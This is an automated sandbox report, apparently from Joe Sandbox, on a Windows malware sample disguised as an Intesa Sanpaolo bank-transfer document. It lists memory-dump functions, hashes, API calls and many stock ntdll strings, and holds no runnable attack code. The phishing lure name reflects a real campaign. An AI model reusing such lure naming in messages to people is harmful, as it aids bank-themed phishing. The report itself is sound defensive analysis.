                                  • Opcode Fuzzy Hash: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                  • Instruction Fuzzy Hash: A290047334140403D144715C55047475005D7D1301F55C031F5075554FC75DCFD57775
                                  Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                  • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                  • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                  • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                  Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 6EA
                                  • API String ID: 1279760036-1400015478
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 204 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                  • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                  • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                  • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                  Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 237 41a7c2-41a7cb 238 41a7cd-41a7ea call 41af60 237->238 239 41a7ac-41a7c0 237->239 241 41a7ef-41a804 LookupPrivilegeValueW 238->241
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: a496f38d62274ef6293b7414ddfcee86aa1f2983a0e4186dedcc86b2506cb2a9
                                  • Instruction ID: d99af1ccc2e3a41905549a2c7186a1e47417f692c9093ccbc51682857587e646
                                  • Opcode Fuzzy Hash: a496f38d62274ef6293b7414ddfcee86aa1f2983a0e4186dedcc86b2506cb2a9
                                  • Instruction Fuzzy Hash: 3AF049B62001187FDB14DFA9DC84EEB37A9EF88350F108519F91CD7281C631E9518BB4
                                  Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 249 41a662-41a687 call 41af60 251 41a68c-41a6a1 RtlFreeHeap 249->251
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: f328f87049165c24a51f13d9e7a0f1effd32b804806cab775e60eade8b30b86c
                                  • Instruction ID: 361753aced8246878da85d9549347fae3a264afc1108e3ae6c6f607104c80fd3
                                  • Opcode Fuzzy Hash: f328f87049165c24a51f13d9e7a0f1effd32b804806cab775e60eade8b30b86c
                                  • Instruction Fuzzy Hash: 53E068B41042850FD700EE79949049F37D4FF80328724865BEC584B307D024C45B8761
                                  Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 252 41a670-41a686 253 41a68c-41a6a1 RtlFreeHeap 252->253 254 41a687 call 41af60 252->254 254->253
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                  Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 41a7d0-41a7e9 256 41a7ef-41a804 LookupPrivilegeValueW 255->256 257 41a7ea call 41af60 255->257 257->256
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                  Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                  Function 01102C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                  • Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
                                  • Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                  • Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275

                                  Non-executed Functions

                                  Function 01178D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                  • a NULL pointer, xrefs: 01178F90
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
                                  • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
                                  • *** Inpage error in %ws:%s, xrefs: 01178EC8
                                  • <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                  • The instruction at %p tried to %s , xrefs: 01178F66
                                  • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
                                  • The resource is owned shared by %d threads, xrefs: 01178E2E
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                  • The instruction at %p referenced memory at %p., xrefs: 01178EE2
                                  • The critical section is owned by thread %p., xrefs: 01178E69
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
                                  • read from, xrefs: 01178F5D, 01178F62
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
                                  • write to, xrefs: 01178F56
                                  • an invalid address, %p, xrefs: 01178F7F
                                  • *** then kb to get the faulting stack, xrefs: 01178FCC
                                  • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
                                  • This failed because of error %Ix., xrefs: 01178EF6
                                  • *** enter .cxr %p for the context, xrefs: 01178FBD
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  • Opcode ID: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                  • Instruction ID: e73718836fe4afcd2c349f782018b60d690a9e2c6e36126d81b7a5bb78b1292e
                                  • Opcode Fuzzy Hash: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                  • Instruction Fuzzy Hash: 9B81E479B40215BFDB2EAA19DC89DAB3F35EF56B54F010048F248AF352E7718912C762
                                  Function 01142349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                  • Instruction ID: 72d9557832db58db8c063178876e12c19de97fd84b5f83d3155cb4c81a1a36cd
                                  • Opcode Fuzzy Hash: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                  • Instruction Fuzzy Hash: 17928E71604742AFE729DF19D880FABB7E8BB84B54F04492DFA94D7250D770E884CB92
                                  Function 010F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                  Download Yara Rule
                                  Strings
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                  • corrupted critical section, xrefs: 011354C2
                                  • Critical section address., xrefs: 01135502
                                  • double initialized or corrupted critical section, xrefs: 01135508
                                  • Critical section debug info address, xrefs: 0113541F, 0113552E
                                  • Thread identifier, xrefs: 0113553A
                                  • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                  • undeleted critical section in freed memory, xrefs: 0113542B
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                  • Invalid debug info address of this critical section, xrefs: 011354B6
                                  • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                  • 8, xrefs: 011352E3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                  • Instruction ID: 62c780c157bc2cef7bcd422742a23cd9fac389810e31fe87a28dc7282ad97876
                                  • Opcode Fuzzy Hash: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                  • Instruction Fuzzy Hash: 58819EB1A40349EFDB68CF99C845BEEBBB6BB48B14F50811AF544BB680D375A940CB50
                                  Function 010F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                  • @, xrefs: 0113259B
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                  • Instruction ID: 9e3c4d930c0cbc607cb50ece130f3309cebea4ca5aa2bf45f229dd87b93b8807
                                  • Opcode Fuzzy Hash: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                  • Instruction Fuzzy Hash: 85027EF1D002299BDB25DB54CC81BDEB7B8AF44704F4041EAE749A7241EB70AE84CF99
                                  Function 01168B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  • Opcode ID: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                  • Instruction ID: 85e1424fc571a3fbf4b00e5df0cd0a9d7d61af5d3f339bdd0a73e5aa3d1d5929
                                  • Opcode Fuzzy Hash: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                  • Instruction Fuzzy Hash: EC51EF715143019BC72DDF18C844BABBBECFFA8244F14491DEA98C7284E7B1D618CBA2
                                  Function 010DAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                  • API String ID: 0-3197712848
                                  • Opcode ID: efca52fdd6f50eca17dbcc746d5d69036b10cfbce1225ab01c55cab5ad545480
                                  • Instruction ID: a7326e8ed4bc7e8ce260e056f6f8fca30573d9742027c93f072da23606741bf5
                                  • Opcode Fuzzy Hash: efca52fdd6f50eca17dbcc746d5d69036b10cfbce1225ab01c55cab5ad545480
                                  • Instruction Fuzzy Hash: D112F371A08352CFD729DF28C480BAABBE4BF95704F0549ADF9C58B291E734D944CB92
                                  Function 01170274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  • Opcode ID: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                  • Instruction ID: ffc2855d4cdd807b773d4aaf49c85acf61b3be01ff40185fd86a117b11f2db48
                                  • Opcode Fuzzy Hash: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                  • Instruction Fuzzy Hash: C6D1EC31600786EFDB2ADF69C490AA9BBF1FF4A704F188059F4869B752C734E980CB14
                                  Function 010CADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                  • API String ID: 0-664215390
                                  • Opcode ID: e3ec5fe8e4639c1e063482bbf28e4bf1db762ec304ea2d18aeca3e6d7ba2303e
                                  • Instruction ID: 3e1265b91b111d8478d58e2030c0f7911c6e8586dc0d391cbb362a4db9756328
                                  • Opcode Fuzzy Hash: e3ec5fe8e4639c1e063482bbf28e4bf1db762ec304ea2d18aeca3e6d7ba2303e
                                  • Instruction Fuzzy Hash: FD32A170E04269CBDB26CB18C895BEEBBB5BF44B80F1441E9E899A7251D7359F818F40
                                  Function 011489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                  • HandleTraces, xrefs: 01148C8F
                                  • VerifierDebug, xrefs: 01148CA5
                                  • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                  • VerifierDlls, xrefs: 01148CBD
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                  • VerifierFlags, xrefs: 01148C50
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                  • Instruction ID: 0a62a1d83cb1d3aa0c5288f87f17379eec03100a8d5c4ecb9a8bd747b1618da1
                                  • Opcode Fuzzy Hash: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                  • Instruction Fuzzy Hash: 5C9147B1A06306EFD72EEFA8C8C0B9B7BE5AB55F18F050468FA816B241C7709C41C795
                                  Function 01144DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                  Download Yara Rule
                                  Strings
                                  • ***Exception thrown within loader***, xrefs: 01144E27
                                  • Execute '.cxr %p' to dump context, xrefs: 01144EB1
                                  • LdrpGenericExceptionFilter, xrefs: 01144DFC
                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01144DF5
                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01144E38
                                  • minkernel\ntdll\ldrutil.c, xrefs: 01144E06
                                  • LdrpProtectedCopyMemory, xrefs: 01144DF4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
